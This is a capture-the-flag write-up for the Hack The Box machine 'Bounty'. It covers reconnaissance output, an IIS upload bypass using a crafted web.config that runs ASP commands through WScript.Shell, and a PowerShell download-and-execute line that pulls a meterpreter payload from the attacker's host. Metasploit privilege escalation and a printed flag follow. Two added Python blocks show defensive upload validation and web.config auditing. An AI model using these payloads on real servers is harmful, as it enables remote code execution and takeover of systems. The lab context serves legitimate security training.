Writeup: Hack The Box - Machines - Bounty

Description

  • Name: Bounty
  • IP: 10.10.10.93
  • Author: mrb3n
  • Difficulty: 4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.93

Nmap scan report for 10.10.10.93
Host is up (0.051s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

From nikto we got:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2018-06-17 16:06:26 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST

+ 7502 requests: 2 error(s) and 7 item(s) reported on remote host
+ End Time: 2018-06-17 16:14:32 (GMT2) (486 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

From dirsearch we got:

200 - 877B - /transfer.aspx
301 - 156B - /UploadedFiles -> http://10.10.10.93/UploadedFiles/
301 - 156B - /uploadedFiles -> http://10.10.10.93/uploadedFiles/
301 - 156B - /uploadedfiles -> http://10.10.10.93/uploadedfiles/
301 - 156B - /aspnet_client -> http://10.10.10.93/aspnet_client/
403 - 2KB - /Trace.axd
301 - 3KB - /WebResource.axd?d=LER8t9aS
403 - 2KB - /aspnet_client/system_web/2_0_50727/Trace.axd
500 - 3KB - /aspnet_client/system_web/2_0_50727/WebResource.axd?d=LER8t9aS

Pwn

The / of the server only shows the image above and nothing else. The server is nonetheless vulnerable to the MS15-043 DoS:

curl -v 10.10.10.93 -H "Host: anything" -H "Range: bytes=0-18446744073709551615"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Requested Range Not Satisfiable</h2>
<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>
</BODY></HTML>
* Connection #0 to host 10.10.10.93 left intact

But the actual DoS exploit does not work against the image because the image is smaller than 256 KB.

The transfer.aspx page is the only one accessible and contains an upload form.

We must first guess what kind of file the form accepts.

The form validates the uploaded file only by its extension and stores it in the /uploadedfiles/ folder (IIS is case insensitive) under the same name and extension as the uploaded file.

If the file is not a valid PNG we get: The image "http://10.10.10.93/uploadedfiles/text.png" cannot be displayed because it contains errors.
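
As an added example (not code from the box or from this writeup), here is the extension-only check the upload form effectively performs beside a hardened validator that case-folds the name, requires exactly one accepted extension and checks the file's magic bytes before the server picks the stored name. The blocked-extension list and the accepted image types are assumptions.

```python
import os
import uuid

# Magic bytes expected for each accepted image extension (assumed accepted set).
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """Extension-only validation like transfer.aspx: the content is never
    inspected, so a file named web.config passes (assumed blocked list)."""
    return not filename.lower().endswith((".asp", ".aspx", ".exe"))


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, stored_name_or_reason). The name is case-folded
    because IIS paths are case-insensitive, and the name written to disk is
    chosen by the server, never by the client."""
    name = os.path.basename(filename.replace("\\", "/")).casefold()
    # Exactly one dot: rejects dotfiles and double extensions such as image.png.config.
    if name.startswith(".") or name.count(".") != 1:
        return False, "unexpected file name"
    ext = os.path.splitext(name)[1]
    if ext not in ALLOWED:
        return False, f"extension {ext!r} is not an accepted image type"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the claimed image type"
    return True, uuid.uuid4().hex + ext
```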

From burp we got: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.

Searching for an aspx web shell we found an interesting article on exploiting the web.config file to run commands: https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/. The web.config is similar to Apache's .htaccess, but this file is processed by the server and can contain .NET code.

The basic file is:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- The ASP code sits inside an XML comment so the file stays well-formed XML; it must not contain a double dash or the comment close sequence
<%
Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

This returns 3 if the upload and execution worked. The next step is to run some shell commands using the WScript.Shell object from the .NET framework:

' Replaces the script block of the basic web.config above: runs a command
' through cmd.exe and writes its output between the comment markers
Set objShell = CreateObject("WScript.Shell")
command = "ipconfig"
Set objCmdExec = objShell.Exec("cmd /c " & command)
getCommandOutput = objCmdExec.StdOut.ReadAll
Response.write("-"&"->")
Response.Write(getCommandOutput)
Response.write("<!-"&"-")

The command runs successfully: we have RCE!
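
Added example (not from this writeup or the box): an audit that flags, in an uploaded web.config, the handler mapping to asp.dll, the Script/Write accessPolicy, the request-filtering removals and any script block hidden after the XML, which is exactly the combination used in the file above. Both sample configs are constructed here; the benign one keeps .config on the blocked-extension list.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the structure of the uploaded web.config above.
MALICIOUS_WEB_CONFIG = rb"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" />
  </handlers>
  <security><requestFiltering>
    <fileExtensions><remove fileExtension=".config" /></fileExtensions>
    <hiddenSegments><remove segment="web.config" /></hiddenSegments>
  </requestFiltering></security>
</system.webServer></configuration>
<!-- <% Response.write(1+2) %> -->
"""

# Constructed benign sample: .config stays blocked and nothing is mapped to a script engine.
BENIGN_WEB_CONFIG = rb"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><security><requestFiltering>
  <fileExtensions><add fileExtension=".config" allowed="false" /></fileExtensions>
</requestFiltering></security></system.webServer></configuration>
"""


def audit_web_config(data: bytes) -> list[str]:
    """Return the findings that make this web.config unsafe to accept in an
    upload directory; an empty list means nothing suspicious was found."""
    findings = []
    root = ET.fromstring(data)
    for handlers in root.iter("handlers"):
        policy = handlers.get("accessPolicy", "")
        if "Script" in policy or "Write" in policy:
            findings.append(f"handlers accessPolicy grants {policy!r}")
        for add in handlers.findall("add"):
            path, proc = add.get("path", ""), add.get("scriptProcessor", "")
            if path.lower().endswith(".config") or proc.lower().endswith("asp.dll"):
                findings.append(f"handler {add.get('name')!r} maps {path!r} to {proc!r}")
    for rem in root.iter("remove"):
        if rem.get("fileExtension", "").lower() == ".config":
            findings.append(".config removed from request-filtering blocked extensions")
        if rem.get("segment", "").lower() == "web.config":
            findings.append("web.config removed from request-filtering hidden segments")
    # The XML parser drops comments, so inspect the raw bytes for server-side script.
    if re.search(rb"<%.*?%>", data, re.S):
        findings.append("server-side <% ... %> script block present outside the XML tree")
    return findings
```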

With the command wmic OS get OSArchitecture we were able to get the system architecture (64-bit); with where /r c:\ *.txt we found the user flag at c:\Users\merlin\Desktop\user.txt, and with type c:\Users\merlin\Desktop\user.txt we got the first flag: e29ad89891462e0b09741e3082f44a2f.

For the root flag we need direct access to the machine, so with metasploit we crafted a web-delivery payload that fetches the meterpreter executable:

And the web.config:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- The ASP code sits inside an XML comment so the file stays well-formed XML; it must not contain a double dash or the comment close sequence
<%
Set objShell = CreateObject("WScript.Shell")
command = "powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://10.10.15.229:8080/d6whTSYy0OgPz');"
Set objCmdExec = objShell.Exec("cmd /c " & command)
getCommandOutput = objCmdExec.StdOut.ReadAll
Response.write("-"&"->")
Response.Write(getCommandOutput)
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

After uploading this file and requesting it with curl http://10.10.10.93/uploadedfiles/web.config we got a session

and migrated to another process to avoid being kicked out.

Once we had a shell as the merlin user, we ran the metasploit module post/multi/recon/local_exploit_suggester to find feasible local exploits on the machine; we then tried exploit/windows/local/ms10_092_schelevator.

With the resulting NT AUTHORITY\SYSTEM shell we got the root flag.